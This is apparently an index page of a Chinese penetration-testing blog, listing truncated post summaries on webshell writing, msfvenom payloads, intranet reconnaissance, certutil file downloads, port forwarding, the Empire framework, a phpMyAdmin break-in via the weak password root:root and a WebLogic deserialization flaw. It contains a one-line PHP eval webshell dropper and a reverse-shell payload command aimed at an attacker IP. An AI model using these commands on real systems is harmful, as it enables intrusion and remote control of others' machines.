2021年8月18日
数据安全治理能力评估方法.pdf
摘要: 数据安全治理能力评估方法.pdf: 链接: https://pan.baidu.com/s/14FYFAECcjn2rysKe7xTZgQ 提取码: ddci 复制这段内容后打开百度网盘手机App,操作更方便哦 数据安全治理实践指南.pdf: 链接: https://pan.baidu.com/s/ 阅读全文
posted @ 2021-08-18 13:56 _H0f 阅读(1219) 评论(0) 推荐(0)
2021年4月9日
windows与Linux写入后门
摘要: Windows: echo ^<?php @eval($_POST[cmd]);?^> > ./1.php Linux echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php 阅读全文
posted @ 2021-04-09 16:24 _H0f 阅读(80) 评论(0) 推荐(0)
2020年5月26日
内网信息收集
摘要: 信息收集 query user || qwinsta 查看当前在线用户 net user 查看本机用户 net user /domain 查看域用户 net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多 net view 阅读全文
posted @ 2020-05-26 14:38 _H0f 阅读(176) 评论(0) 推荐(0)
2020年3月6日
msfvenom常用生成payload命令
摘要: windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=攻击端口 -a x86 --platform Windows -f exe > okc.exe msfvenom -p windows/x64/meterpre 阅读全文
posted @ 2020-03-06 15:36 _H0f 阅读(721) 评论(0) 推荐(0)
2020年2月20日
Windows命令行读取写删下载文件命令
摘要: Windows命令行读取写删下载文件命令 读取文件 type qq.txt 下载远端文件 certutil -urlcache -split -f http://XXXXX/test.bat 查找文件 for /r D:\ %i in (*2020*) do @echo %i #在D盘查找命名中带有 阅读全文
posted @ 2020-02-20 22:36 _H0f 阅读(627) 评论(0) 推荐(0)
2020年2月15日
Windows端口转发
摘要: 转发:https://blog.csdn.net/u014199860/article/details/80415519 Windows下端口转发,以实现远程端口3389为例场景如下先说明一下场景,服务器A处于局域网环境内,IP为192.168.1.200(同时作为虚拟机B的网关192.168.13 阅读全文
posted @ 2020-02-15 23:48 _H0f 阅读(364) 评论(0) 推荐(0)
2019年11月21日
No module named dropbox
摘要: pip install dropbox2 或者: wgte https://files.pythonhosted.org/packages/88/c9/899c5d112eb4aa48fb611153c2f2eadafd859cbdee637b376d140a60e50d/dropbox-9.4.0 阅读全文
posted @ 2019-11-21 22:26 _H0f 阅读(180) 评论(0) 推荐(0)
2019年11月20日
Empire安装使用
摘要: 安装使用: Empire运行在linux平台上,使用的系统是Centos,首先使用git命令把程序目录下载下来,如下图所示。 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装empire,命令如下: cd Emp 阅读全文
posted @ 2019-11-20 13:33 _H0f 阅读(2400) 评论(0) 推荐(0)
2019年6月7日
Phpmyadmin的一次渗透测试
摘要: 首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.p 阅读全文
posted @ 2019-06-07 00:37 _H0f 阅读(1287) 评论(0) 推荐(0)
2019年4月25日
Weblogic反序列化远程命令执行漏洞(CNVD-C-2019-48814)测试
摘要: 漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic 组件进行远程攻击,并 阅读全文
posted @ 2019-04-25 17:26 _H0f 阅读(2662) 评论(0) 推荐(0)
下一页
点击右上角即可分享
微信分享提示